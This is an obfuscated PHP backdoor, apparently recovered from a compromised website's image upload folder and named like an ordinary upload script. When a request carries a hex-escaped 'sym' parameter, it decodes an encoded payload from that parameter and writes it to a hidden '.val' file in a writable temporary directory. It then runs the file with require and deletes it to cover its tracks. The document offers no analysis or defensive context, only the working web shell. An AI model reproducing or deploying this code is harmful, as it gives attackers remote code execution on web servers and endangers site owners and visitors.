File: //proc/thread-self/root/proc/self/root/home/vitanhod/prostanur1.vitavit.com.pk/img/uploadbplan.php
<?php
if(in_array("\x73ym", array_keys($_REQUEST))){
$ent = array_filter(["/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), "/tmp", "/var/tmp"]);
$ref = $_REQUEST["\x73ym"];
$ref= explode ('.' , $ref);
$entity = '';
$s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s2 );
foreach ($ref as $v => $v4):
$sChar = ord($s2[$v%$sLen] );
$d = ((int)$v4 - $sChar - ($v%10)) ^ 65;
$entity .=chr($d );
endforeach;
$pset = 0;
do {
$value = $ent[$pset] ?? null;
if ($pset >= count($ent)) break;
if (is_dir($value) ? is_writable($value) : false) {
$binding = implode("/", [$value, ".val"]);
if (file_put_contents($binding, $entity)) {
require $binding;
unlink($binding);
exit;
}
}
$pset++;
} while (true);
}